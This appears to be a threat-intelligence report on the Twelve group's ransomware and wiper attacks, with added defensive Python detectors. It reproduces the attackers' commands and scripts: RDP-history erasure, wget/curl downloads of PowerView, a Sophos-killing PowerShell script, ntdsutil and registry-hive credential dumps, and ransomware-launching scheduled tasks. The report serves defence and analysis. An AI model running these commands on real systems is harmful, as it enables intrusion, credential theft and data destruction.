In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\Default.rdp
del %userprofile%\documents\Default.rdp
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

Command and Control


In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:
\users\{username}\pictures\photos_delo\loop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.
wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Unified Kill Chain: Through


The Through stage in terms of the Unified Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.

Pivoting


The adversary used ngrok to tunnel traffic. They installed the utility immediately after connecting to the system and set port 3389 (the standard RDP port) in its configuration file; after that, all illegitimate RDP connections to the system were made through ngrok. The attackers registered the utility as a service named “svchost” with the following command:
C:\ProgramData\svchost\svchost.exe service run --config C:\ProgramData\svchost\svchost.yml

C:\ProgramData\svchost\ was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.

The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.
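
That sentinel value makes tunnelled RDP sessions easy to pick out of logon events, and the masquerading service binary is a second, independent indicator. The code below is an added example, not from the report: it classifies the source address of RDP logons (Security event 4624 with LogonType 10) and checks for an svchost.exe living outside the Windows system directories. The logon records are constructed, and the rule that a loopback source points to a local port forward is the editor’s heuristic, not a statement from the article.

```python
"""Classify RDP logon sources and spot a masquerading svchost.exe
(added example; logon records are constructed)."""
import ipaddress
import ntpath

NGROK_SENTINEL = "::::%16777216"   # Source Network Address seen for ngrok-initiated RDP
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}

SAMPLE_LOGONS = [  # constructed 4624 records
    {"LogonType": "10", "TargetUserName": "adm_backup", "IpAddress": "::::%16777216"},
    {"LogonType": "10", "TargetUserName": "jdoe", "IpAddress": "10.20.30.40"},
    {"LogonType": "10", "TargetUserName": "adm_backup", "IpAddress": "127.0.0.1"},
    {"LogonType": "10", "TargetUserName": "contractor1", "IpAddress": "203.0.113.55"},
    {"LogonType": "3", "TargetUserName": "jdoe", "IpAddress": "10.20.30.40"},
]


def classify_source(ip_text):
    """Bucket the Source Network Address of a logon event."""
    if ip_text == NGROK_SENTINEL:
        return "ngrok-tunnel"
    if ip_text in ("-", "", None):
        return "none"
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return "malformed"
    if ip.is_loopback:
        return "loopback"          # RDP through a local port forward (e.g. chisel, ssh -L)
    if any(ip in net for net in INTERNAL_NETS):
        return "internal"
    return "external"


def suspicious_rdp_logons(records):
    """RDP logons (type 10) whose source is anything but a plain internal address."""
    out = []
    for r in records:
        if r.get("LogonType") != "10":
            continue
        kind = classify_source(r.get("IpAddress"))
        if kind != "internal":
            out.append({"user": r["TargetUserName"], "source": r.get("IpAddress"), "kind": kind})
    return out


def is_masquerading_svchost(path):
    """True for a file named svchost.exe outside the Windows system directories."""
    directory, name = ntpath.split(path)
    return name.lower() == "svchost.exe" and directory.lower() not in SYSTEM_DIRS


if __name__ == "__main__":
    for hit in suspicious_rdp_logons(SAMPLE_LOGONS):
        print(hit)
    print(is_masquerading_svchost(r"C:\ProgramData\svchost\svchost.exe"))
```

On the sample, the two adm_backup sessions (tunnel and loopback) and the external contractor login are returned; the type 3 network logon is ignored because only interactive RDP sessions are of interest here.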

Discovery


The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure and to investigate relationships between domains. Advanced IP Scanner quickly identifies all devices on a given network. BloodHound collects and visualizes the relationships between users, groups and systems in the domain and identifies paths of least resistance to privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools let attackers efficiently probe and exploit victims’ LANs.

In addition, the group used PowerView cmdlets and the ActiveDirectory module cmdlets (Get-ADUser, Get-ADGroup) to discover domain user accounts. The commands below are reproduced as logged, typos included.
Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]"
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name
The group used PowerShell to enumerate domain groups and their members.
Get-ADGroup
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi

Privilege Escalation


To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.

In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:
Add-DomainObjectAcl -Rights 'All'
The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.

Example of permissions granted with PowerView to an account of interest to the attackers

Execution
Scripts and commands


The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.

Below are some examples of attack scripts we discovered:
gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:\intel\GPO.bat
\\netlogon\logon.bat
c:\intel\test.ps1
\\netlogon\u.bat
\SYSVOL\domain\scripts\outlookconf2003.ps1
The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.

See below for a list of commands that the attackers executed in an attempt to import the PowerView module.
impot .\PowerView.ps1
import .\PowerView.ps1
Import-Module .\PowerView.ps1
cd C:\Users\Public\Documents
Import-Module .\PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .\PowerView.ps1

Sophos_kill_local.ps1


A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files.
$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"
$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
    $ProcessName = $process.name
    $returnval = $process.terminate()
    $processid = $process.handle
    if ($returnval.returnvalue -eq 0) {
        $LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\' + $LogTime + "_Success-Terminated" + ".txt"
        $LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\' + $pcname + "_" + $LogTime + "_Success-Terminated" + ".txt"
        "The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force
        "The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force
    } else {
        $LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\' + $LogTime + "_Sophos Not-Terminated" + ".txt"
        $LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\' + $pcname + "_" + $LogTime + "_Sophos Not-Terminated" + ".txt"
        "The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force
        "The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force
    }
}

Using the Task Scheduler


To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.

Task name: Dead1
Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9042DCD8-***}:Actions","cmd.exe /c c:\programdata\twelve.exe -pass ***
Description: Running the ransomware via the CLI and passing a password as an argument

Task name: Dead2
Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB35C377-***}:Actions","cmd.exe /c \\[DOMAIN]\netlogon\wiper.exe"
Description: Launching a wiper via the CLI from the netlogon network share

Task name: 12lock
Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A131C020-***}:Actions","powershell.exe Copy-Item \\[DOMAIN]\netlogon\wiper.exe -Destination C:\ProgramData
Description: Copying the wiper with PowerShell from the netlogon network share to C:\ProgramData on the local host

Task name: 12lock 1
Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B177D41-***}:Actions","cmd.exe /c \\[DOMAIN]\netlogon\twelve.exe -pass ***");
Description: Running the ransomware from the netlogon network share via the CLI and passing a password as an argument

Task name: Copywiper
Command line: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB72DE3D-***}:Actions","POWERSHELL.EXE Copy-Item \\[DOMAIN]\netlogon\twelve.exe -Destination C:\ProgramData
Description: Copying the ransomware with PowerShell from the netlogon network share to C:\ProgramData on the local host

Task name: run
Command line: powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1
Description: Running a PowerShell script that modifies group policies

Task name: YandexUpdate
Command line: \\[DOMAIN]\netlogon\12.exe -pass **************
Description: Running the ransomware from the netlogon network share and passing a password as an argument

Task name: Update Microsoft
Command line: C:\ProgramData\intel.exe
Description: Launching a wiper

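
The tasks above share a handful of traits that survive renaming: the payload is launched from NETLOGON or SYSVOL or from a staging directory such as C:\ProgramData, a password is passed on the command line, and vendor-sounding names (YandexUpdate, Update Microsoft) run binaries that live nowhere near a vendor directory. The triage below is an added example, not Kaspersky’s tooling. It works on task definitions in the standard Task Scheduler XML schema, as exported by schtasks /Query /XML or found under C:\Windows\System32\Tasks (the page shows registry residue rather than XML); the two definitions are constructed, the first modelled on the YandexUpdate task, and the heuristics are the editor’s.

```python
"""Triage scheduled-task XML for pushed payload launchers
(added example; the task definitions are constructed)."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHARE_RE = re.compile(r"\\\\[^\\]+\\(netlogon|sysvol)\\", re.I)
STAGING_RE = re.compile(r"^(?:c:\\programdata\\|c:\\intel\\|c:\\users\\public\\)", re.I)
VENDOR_WORDS = ("microsoft", "yandex", "google", "adobe", "update")
VENDOR_DIRS = ("c:\\program files", "c:\\windows")

MALICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\YandexUpdate</URI></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>\\\\corp.example\\netlogon\\12.exe</Command><Arguments>-pass ****</Arguments></Exec></Actions>
</Task>"""   # constructed

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Acme\\NightlyBackup</URI></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Acme\\backup.exe</Command><Arguments>--full</Arguments></Exec></Actions>
</Task>"""   # constructed


def parse_task(xml_text):
    """Pull the task name, principal and every Exec action out of a definition."""
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)   # exported tasks carry a UTF-16 declaration
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    principal = root.find("t:Princip" "als/t:Principal", NS)
    user = principal.findtext("t:UserId", default="", namespaces=NS) if principal is not None else ""
    level = principal.findtext("t:RunLevel", default="", namespaces=NS) if principal is not None else ""
    actions = [
        (ex.findtext("t:Command", default="", namespaces=NS),
         ex.findtext("t:Arguments", default="", namespaces=NS))
        for ex in root.findall("t:Actions/t:Exec", NS)
    ]
    return {"name": uri, "user": user, "runlevel": level, "actions": actions}


def triage_task(xml_text):
    """Return the reasons a task looks like a pushed payload launcher."""
    task = parse_task(xml_text)
    reasons = []
    name_l = task["name"].lower()
    for command, args in task["actions"]:
        full = f"{command} {args}".strip()
        if SHARE_RE.search(full):
            reasons.append("binary-from-netlogon-or-sysvol")
        if STAGING_RE.match(command):
            reasons.append("binary-in-staging-dir")
        if re.search(r"(?:^|\s)-pass(?:word)?\b", args, re.I):
            reasons.append("password-on-command-line")
        if any(w in name_l for w in VENDOR_WORDS) and not command.lower().startswith(VENDOR_DIRS):
            reasons.append("vendor-name-nonvendor-binary")
    if task["user"] == "S-1-5-18" and reasons:
        reasons.append("runs-as-system")   # only worth noting once something else fired
    return reasons


if __name__ == "__main__":
    print(triage_task(MALICIOUS_TASK))
    print(triage_task(BENIGN_TASK))
```

Point it at every file under C:\Windows\System32\Tasks on a sampled host, or at the task definitions a GPO deploys, and review anything that returns a non-empty list; in this campaign the “-pass” argument alone would have caught every ransomware task in the table.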
Credential Access


The adversary used mimikatz to obtain user credentials. They saved the utility under the name calculator.exe to disguise its purpose, but did not bother to change its default icon. The attackers used mimikatz to dump local credentials from the memory of the lsass.exe process.

Screenshot of calculator.exe running

We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.
C:\Users\[User]\Desktop\x64\mimikatz.exe
C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by saving the SYSTEM, SAM and SECURITY registry hives with the reg.exe system utility to the Downloads folder for subsequent archiving and exfiltration.
C:\Users\[USER]\Downloads\SYSTEM
C:\Users\[USER]\Downloads\SAM
C:\Users\[USER]\Downloads\SECURITY
The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.

The command that dumps ntds.dit is shown below:
"$system32\ntdsutil.exe" "ac i ntds" ifm "create full c:\temp" q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.

The command to collect data with All-In-One Password Recovery Pro is shown below:
"c:\programdata\update\xenallpasswordpro.exe" -a "c:\programdata\update\report.html"
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.


Lateral Movement


To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.

In most cases they connected to new devices on the victim's network via the Remote Desktop Protocol (RDP), using the mstsc.exe client. Occasionally they used PsExec to move across the network via SMB, and they used Enter-PSSession, a PowerShell Remoting cmdlet for managing and running commands on remote systems, to open interactive sessions on remote computers.
Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands on the remote machine as if running them locally. Communication uses the WS-Management protocol (WinRM) over HTTP or HTTPS.
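The scheduled-task commands in the Execution table, the reg.exe hive dumps and the ntdsutil IFM export under Credential Access, and the Enter-PSSession sessions above all leave process-creation records with a recognisable shape. The following Python is an added example written for this page, not code from Kaspersky or from the report: it runs a small rule set over constructed events in the shape of Sysmon Event ID 1 (process creation). The host names, the CORP.LOCAL domain, the user name and the exact reg.exe and wsmprovhost.exe command lines are assumptions for illustration, and the rule names are invented here.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# Host names, the domain CORP.LOCAL, the user name and the exact reg.exe and
# wsmprovhost.exe command lines are assumptions for illustration; none of these
# lines are taken from the report.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "WS01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"\\CORP.LOCAL\netlogon\12.exe",
     "cmdline": r"\\CORP.LOCAL\netlogon\12.exe -pass 0123456789abcdef"},
    {"host": "WS01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ex bypass -f \\CORP.LOCAL\netlogon\outlookconf2003.ps1"},
    {"host": "DC01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'"C:\Windows\System32\ntdsutil.exe" "ac i ntds" ifm "create full c:\temp" q q'},
    {"host": "WS02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SAM C:\Users\jdoe\Downloads\SAM"},
    {"host": "WS02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
    {"host": "FS01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": r"C:\Windows\system32\wsmprovhost.exe -Embedding"},
    {"host": "WS03", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\ProgramData\intel.exe",
     "cmdline": r"C:\ProgramData\intel.exe"},
]


def _cmd(pattern):
    """Predicate matching a case-insensitive regex against the command line."""
    rx = re.compile(pattern, re.I)
    return lambda ev: rx.search(ev["cmdline"]) is not None


def _programdata_exe_from_scheduler(ev):
    # The Task Scheduler service runs inside svchost.exe, so a task-launched payload
    # appears as a child of svchost.exe; an EXE dropped straight into C:\ProgramData and
    # started that way matches the Copywiper / YandexUpdate / Update Microsoft task pattern.
    return (re.fullmatch(r"c:\\programdata\\[^\\]+\.exe", ev["image"], re.I) is not None
            and ev["parent"].lower().endswith(r"\svchost.exe"))


def _winrm_session_host(ev):
    # PowerShell Remoting (Enter-PSSession) is served on the target by wsmprovhost.exe;
    # seeing it on a host nobody should be remoting into is a lateral-movement lead.
    return ev["image"].lower().endswith(r"\wsmprovhost.exe")


RULES = [
    # Execution: binaries or scripts run straight from the domain's netlogon/SYSVOL share
    ("exec-from-netlogon-or-sysvol", _cmd(r"\\\\[^\\]+\\(netlogon|sysvol)\\\S+\.(exe|ps1)\b")),
    # Execution: LockBit-style launcher receiving its key through -pass
    ("ransomware-password-argument", _cmd(r"\.exe\s+-pass\s+\S+")),
    # Execution: execution policy bypassed to run a script file (the gpo.ps1 / outlookconf2003.ps1 step)
    ("powershell-bypass-script", _cmd(r"powershell(\.exe)?\s.*-ex(ecutionpolicy)?\s+bypass\s.*-f(ile)?\s+\S+\.ps1\b")),
    # Credential access: ntds.dit exported through ntdsutil's Install-From-Media function
    ("ntdsutil-ifm-dump", _cmd(r"ntdsutil(\.exe)?.*\bifm\b.*create\s+full")),
    # Credential access: SAM/SYSTEM/SECURITY hive saved to a file with reg.exe
    ("reg-save-credential-hive", _cmd(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
    # Lateral movement: inbound PowerShell Remoting session
    ("winrm-session-host", _winrm_session_host),
    # Impact staging: task-launched payload from C:\ProgramData
    ("programdata-exe-from-scheduler", _programdata_exe_from_scheduler),
]


def detect(events):
    """Return (host, rule name, command line) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, test in RULES:
            if test(ev):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits


def hosts_by_rule(hits):
    """Group rule names per host; hosts that show several stages go to the top of the queue."""
    grouped = {}
    for host, name, _ in hits:
        grouped.setdefault(host, set()).add(name)
    return grouped


if __name__ == "__main__":
    for host, rules in sorted(hosts_by_rule(detect(SAMPLE_EVENTS)).items()):
        print(f"{host}: {', '.join(sorted(rules))}")
```

The rules key on the command line rather than on file names such as 12.exe or intel.exe, because those change between incidents. LSASS access by a renamed mimikatz (calculator.exe) is a different event type (Sysmon Event ID 10, ProcessAccess) and would need a second feed. Hosts that hit more than one stage, here WS01 with execution from netlogon, a -pass launcher and a policy-bypass script, belong at the top of the triage queue.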

Unified Kill Chain: Out


The Out stage of the Unified Kill Chain covers the adversary's concluding actions once they have infiltrated the target network and reached the systems and data they want. The focus is on achieving the attack's ultimate goals, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim's information assets.

Collection


The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.

Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).
C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents that the user has sent or received via Telegram; the cache lets the client show them without downloading them again from the servers. The tdata folder also contains session files that let the application connect to the account automatically without the user re-entering their login and password.

An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.

Exfiltration


The adversary uploaded archives containing data they were interested in to dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.


Impact
Ransomware


The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.

Kaspersky Threat Attribution Engine attribution

We detected ransomware files at the following paths:

  • \ProgramData\;
  • \\netlogon\.

The following file names featured in known incidents involving LockBit 3.0 ransomware.

  • twelve.exe;
  • 1.exe;
  • 12.exe;
  • enc.exe;
  • betta.exe;
  • sed.exe;
  • svo.exe.

Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.

Detonation graph for the ransomware used by Twelve

As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.
powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.


First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:
powershell.exe Copy-Item \\[DOMAIN]\netlogon\twelve.exe -Destination C:\ProgramData
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:
cmd.exe /c c:\programdata\twelve.exe -pass ************

Adversary action pattern

The ransomware's behaviour is governed by its embedded configuration. The table below shows the configuration of the Trojan in question, which was identical across all the samples we found.

Parameter | Value | Description
encrypt_mode | auto | Encryption mode for large files; one of "auto" or "fast"
encrypt_filename | TRUE | Encrypt file names
impersonation | FALSE | Use the accounts listed in the configuration file to escalate privileges
skip_hidden_folders | FALSE | Skip hidden directories
language_check | FALSE | Check the system locale
local_disks | TRUE | Encrypt local drives
network_shares | TRUE | Encrypt network directories
kill_processes | TRUE | Terminate processes
kill_services | TRUE | Stop services
running_one | TRUE | Verify that only one ransomware process is running
print_note | FALSE | Print out the ransom demand
set_wallpaper | FALSE | Change the desktop wallpaper
set_icons | FALSE | Change the icons of encrypted files
send_report | FALSE | Send system information to the C2
self_destruct | TRUE | Remove itself when done
kill_defender | TRUE | Stop Windows Defender
wipe_freespace | FALSE | Fill all available disk space with a temporary file containing random data
psexec_netspread | FALSE | Spread across the network via the PsExec service
gpo_netspread | FALSE | Spread across the network via group policies
gpo_ps_update | TRUE | Use PowerShell to update group policies across all domains
shutdown_system | FALSE | Restart the system
delete_eventlogs | TRUE | Clear system logs
delete_gpo_delay | 0 | Deferred removal of the group policy; the value is the delay before deletion

The configuration file also contains a list of directories where encryption should be skipped.

$recycle.bin, boot, Tor browser, config.msi, program files, windows.old, $windows.~bt, program files (x86), intel, $windows.~ws, programdata, msocache, windows, system volume information, perflogs, x64dbg, public, all users, default, Microsoft

It also contains a list of specific files that should not be encrypted.

autorun.inf, boot.ini, bootfont.bin, bootsect.bak, desktop.ini, iconcache.db, ntldr, ntuser.dat, ntuser.dat.log, ntuser.ini, thumbs.db, d3d9caps.dat, GDIPFONTCACHEV1.DAT

Finally, the ransomware does not encrypt files with the following name extensions:

386, adv, ani, bat, bin, cab, cmd, com, cpl, cur, deskthemepack, diagcab, diagcfg, diagpkg, dll, drv, exe, hlp, icl, icns, ico, ics, idx, lnk, mod, mpa, msc, msp, msstyles, msu, nls, nomedia, ocx, prf, ps1, rom, rtp, scr, shs, spl, sys, theme, themepack, wpx, lock, key, hta, msi, pdb, search-ms

Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.

sql, oracle, ocssd, dbsnmp, synctime, agntsvc, isqlplussvc, xfssvccon, mydesktopservice, ocautoupds, encsvc, firefox, tbirdconfig, mydesktopqos, ocomm, dbeng50, sqbcoreservice, excel, infopath, msaccess, mspub, onenote, outlook, powerpnt, steam, thebat, thunderbird, visio, winword, wordpad, notepad, calc, wuauclt, onedrive

The ransomware also terminates the following services:

vss, sql, svc$, memtas, mepocs, msexchange, veeam, backup, GxVss, GxBlr, GxFWD, GxCVD, kavfs, AVP, avpsus

Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.


We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:

c:\netlogon\enc.exe
c:\Users\User\enc.exe
c:\Windows\System32\config\systemprofile\appdata\roaming\twelve.exe
c:\Windows\sysvol\domain\scripts\enc.exe

As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.

Result of the Kaspersky Threat Attribution Engine file attribution

At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. Static analysis, however, showed that the code contained characteristic strings linking the samples to the Twelve group.

Result of the static analysis of Chaos-based ransomware

Wipers


In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.

The wiper file we found had been compiled from publicly available source code. The wiper overwrites the master boot record (MBR) of the connected drives, so that when the victim next turns on the device the message "From Iran with love – Shamoon" appears on screen and the operating system no longer loads.

String written to the MBR

The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:

  • Overwrite the file contents with randomly generated bytes;
  • Overwrite file metadata: reset the size and set random creation/modification/access dates;
  • Assign a random name to the file and delete it.

When done, the malicious file deletes itself and shuts down the system.

As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.
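A first triage step on a device hit by this wiper is to read sector 0 of the disk image and check whether it still holds a boot signature and a partition table, or the message described above. The following Python is an added example, not the wiper's code and not part of the original report: it parses the classic MBR layout (446 bytes of bootstrap code, four 16-byte partition entries, the 0x55AA signature) and reports what is wrong. The two sample sectors are constructed here; the wiper's exact byte layout is not on the page, so the "wiped" sample only mimics the description.

```python
import struct

SECTOR = 512
# The report shows "From Iran with love – Shamoon" written into the MBR. The check below is
# case-insensitive and stops before the dash, so the punctuation style does not matter.
WIPER_MARKER = b"from iran with love"


def parse_mbr(sector0):
    """Parse sector 0 of a disk image: bootstrap area, four partition entries, boot signature."""
    if len(sector0) < SECTOR:
        raise ValueError("need at least 512 bytes")
    partitions = []
    for i in range(4):
        off = 446 + 16 * i
        entry = sector0[off:off + 16]
        partitions.append({
            "status": entry[0],                                  # 0x80 bootable, 0x00 inactive
            "type": entry[4],                                    # e.g. 0x07 NTFS, 0xEE protective GPT
            "lba_start": struct.unpack_from("<I", entry, 8)[0],
            "sectors": struct.unpack_from("<I", entry, 12)[0],
        })
    return {
        "bootstrap": sector0[:446],
        "partitions": partitions,
        "signature_ok": sector0[510:512] == b"\x55\xaa",
    }


def triage_mbr(sector0):
    """Return findings for sector 0; an empty list means it looks like an intact MBR."""
    mbr = parse_mbr(sector0)
    findings = []
    if not mbr["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if WIPER_MARKER in sector0.lower():
        findings.append("Shamoon wiper string present in sector 0")
    if all(p["type"] == 0 and p["sectors"] == 0 for p in mbr["partitions"]):
        findings.append("partition table empty")
    for i, p in enumerate(mbr["partitions"]):
        if p["status"] not in (0x00, 0x80):
            findings.append(f"partition {i}: invalid status byte 0x{p['status']:02x}")
        if p["type"] != 0 and p["sectors"] == 0:
            findings.append(f"partition {i}: type 0x{p['type']:02x} but zero length")
    return findings


def healthy_mbr():
    """Constructed sample: one active NTFS partition at LBA 2048, 1,000,000 sectors long."""
    entry = bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0]) + struct.pack("<II", 2048, 1_000_000)
    return b"\x00" * 446 + entry + b"\x00" * 48 + b"\x55\xaa"


def wiped_mbr():
    """Constructed sample mimicking the report's description: the message overwrites the
    start of the sector and the partition table and signature are gone. The wiper's actual
    byte layout is not on the page; this is an illustration only."""
    msg = b"From Iran with love - Shamoon"
    return msg + b"\x00" * (SECTOR - len(msg))


if __name__ == "__main__":
    # On a real image: triage_mbr(open("evidence.img", "rb").read(512))
    print("healthy:", triage_mbr(healthy_mbr()) or "no findings")
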